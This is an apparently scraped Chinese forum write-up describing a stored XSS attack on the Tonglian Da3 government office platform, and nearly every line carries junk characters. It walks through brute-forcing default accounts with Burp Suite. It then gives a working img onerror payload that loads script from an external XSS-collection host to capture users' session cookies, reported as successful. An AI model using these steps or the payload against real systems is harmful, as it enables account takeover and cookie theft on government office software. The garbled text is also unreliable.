- ]" y9 G2 E1 }) u 5 S; `# V+ P! q
同联Da3协同办公平台后台通用储存型xss漏洞8 D+ i9 }0 v! G4 i/ i) _1 j
1 M1 K7 V( Q1 I; y' {
6 X% @' n% I' l) N& Q; V$ I 平台简介:
; z% [( e9 q8 E1 ], u) k3 {8 K
! Q1 U% `* _: U0 z) P" P- C4 Y8 o2 o
/ U4 c0 ?) i e6 P. Q2 w1 U
) M$ b& T- ^3 S# `5 j- p# F
. t4 |5 o7 k3 z* q% g ! r& O# c" m* F) H! e1 V3 f
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( X6 }5 E( L+ ?; V5 o8 y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
5 l$ k/ j- d& q1 o$ G+ Q! ?( Y
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!; M) P/ E/ i, F2 D% x p* O) u
# J$ F. q9 d5 P) h: D
1 x2 Z; ~) H$ `# P2 s1 N
# C% z! v. G+ i$ E& ?
9 A5 G4 w, v" e: O " D$ g9 y% ]$ k' r% h5 q) R
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:. ~9 A/ |9 A" ~" S0 b& ]
3 c y% M( } N" I, t3 e* U, q
) R9 B0 Q& m7 D: `
2 [) I' Z* b. v2 L3 s# [
$ N: ^) z- K) m9 J% p9 Q4 x
/ b: H: Q9 m0 Z% n2 l9 J1 e http://1.1.1.1:7197/cap-aco/#(案例2-)
6 a+ |0 C- @' f
! P& \6 P5 r% M- ~2 G
0 Y% V4 k% D8 a http://www.XXOO.com (案例1-官网网站)4 u1 S9 D- G6 [
; g! @# r# r" U+ E9 l
+ c$ f; r: _( i# @ 漏洞详情:
4 i- D9 O, S7 _8 W# N' z4 ~
) ]1 ~: M. S/ n {4 Q' K1 h! U" B
( {& I7 M* r3 {+ C$ H 案例一、
7 H1 @2 r. \& l( f0 v! K6 o
5 T" `6 {+ U0 j# z: J5 [+ d
& X+ h9 A( ? c) D# p5 X
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
0 Q6 i8 X+ d: Y' q! E: I+ s
2 X5 t& t6 G9 O9 a) {
' L$ A9 K. }* x1 B. I9 | 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; i3 M6 D5 q- F, J/ n: l# h
& ^2 `! r8 _* |4 e8 K 7 ^- v! s* i. W, Z* z" l8 k$ e+ X
) ?* O; i# Z; ]1 Z8 m: {( I( ~/ L
% _: S4 F7 P: f: C; `( S3 t3 ]" G
7 t5 ?: _8 p9 n9 _- g5 L. k
& M9 n9 p( r# U( Y" D
& q) \% @7 X4 [6 c) V1 T
% O" b- p- r) Y% ~* v! {/ S status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ( `: \* F' N S, P9 g: ^$ A; L% V
# z2 ?3 Z4 F6 a: v: h* g( b" {/ s! w: b
1 U s" `( \2 B" |# {* t
3 X5 G, [2 s2 f* R! p. D3 r
, Z' k- b* h7 C* z1 q' N0 a
6 i% l# ~7 v/ s1 c
% O9 B% y, H" T* k
. b. s1 ~) ]8 j 3 k. u `2 F' v% j2 Q
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 4 X7 ~# ?+ s/ R, H' Q- |
, j# b4 B' w5 i) T* }
0 `/ Q% e, q8 t6 }
/ l8 Q9 B& i$ E: k( o3 `
; s! q+ _6 C) e. ~ / R) L3 z7 ~4 ` n+ n' Y5 ~- Y4 a
<img src=x
7 u, L) [3 i$ s2 }' f% a# ?onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: . C* d9 T$ h, [% \9 b+ f1 L
; ]- r$ P1 s! _4 c7 B1 L
5 H o) }: }' j* q
8 U* ~- R6 b" J8 O8 \- m: L: z1 J
! W3 ]9 t4 ^* ^' R . J- i$ A; {9 y3 \
然后发送,接收cookie如图:
$ I3 V4 \" b, y( v8 z: _: s- ?' k% S2 w; Z
$ u( B* d( v2 r) X
2 ?( B" }% w% `1 X* F8 e 3 K$ Q" h8 S f$ l0 e8 I% J- u9 h; c
8 o$ b0 J8 z" |9 P9 h- Y& k
7 x5 T0 G+ k/ h. B0 g; F% m
* S. K6 j9 ], [; o' j6 w
0 S. S' W% R7 y/ f4 U2 v" d
@. O( S- A0 U7 E. F " A0 C4 P9 ?' {5 t/ P+ l$ X. h: ^+ j% T
. S" C7 [6 p, c' [4 n2 D
: T' g- q3 c7 A* \( l
# H4 l. s( _2 c$ p2 g& u
1 ?3 ~# }+ Q j5 ]3 _
' p- c' y l2 ]* w/ o: ?) J
' W: \8 t: |0 h5 s- I% ^
; b* W8 m9 f' Z5 @3 E/ c 1 q3 p* N' g! d: P, D7 p; Y
2 k. {5 f# i% R) b- D0 b
3 ~, `% c- A# _* f7 A; C) ] L% s 4 r$ m6 h8 ?% {! A' [% K
Q7 J" I% ^ t$ R# o" @
1 T+ G2 D- W& H6 e& D" K
7 c" P/ t7 k, L 案例2、 $ B0 H& I5 Y$ B5 L n- A1 w+ [4 Z" r
' I: t# ?# Q( F! y+ o
) K3 t" C: p0 ^8 w6 ?" l
前面步骤都一样,下面看效果图: ; z& x& c2 @$ u* f8 z; J6 a4 H* [4 z
3 x2 ^$ \9 z+ h' X D; D( N9 n
/ |7 r. a: R2 a9 y3 j, t" O: W
) J8 l9 I+ B7 p) }5 Z
+ ?( w% {% N# F* Z8 h 2 w/ j( q' x' q2 w- ?
8 V% g5 [/ \- b& A A, d3 r3 Z4 H0 `" e
* Z* @! i' N% @ s; n
4 e7 M& \! b+ g. |6 a2 n' b% R' y 4 j8 }) A. t& R: G
+ D5 U m: r+ {0 p. f: t
+ E9 F1 I6 ]4 @) R+ ~0 U+ B2 e0 M( e9 @ W' k8 L6 S- a% T9 }
3 \8 a T% J' k, e: `
% m$ t( y2 S# o- M
- `, Y9 t2 e/ V8 x" x3 ]# ~
( z- z" Y0 w {; l2 S
' x0 n2 X# K# T8 M7 U, g: a % w2 b; l4 L$ S# `
! D- P+ `! V+ j1 S# P3 ~* {, ] / F! E" T2 z5 U1 L/ r( o- L
; @" Y: v8 E$ D" N
1 k" d. L- k$ C( S! ^
4 t; P: A& \9 Q* B. c( o* Q9 j
9 U6 [ p, R6 q
* r/ e4 {) ]% L) `+ s4 C
' T, P( w/ X& @5 P7 D& Z
! W8 d# q+ A, Z6 W+ |. T
. O1 l. n0 @2 H% i" @6 i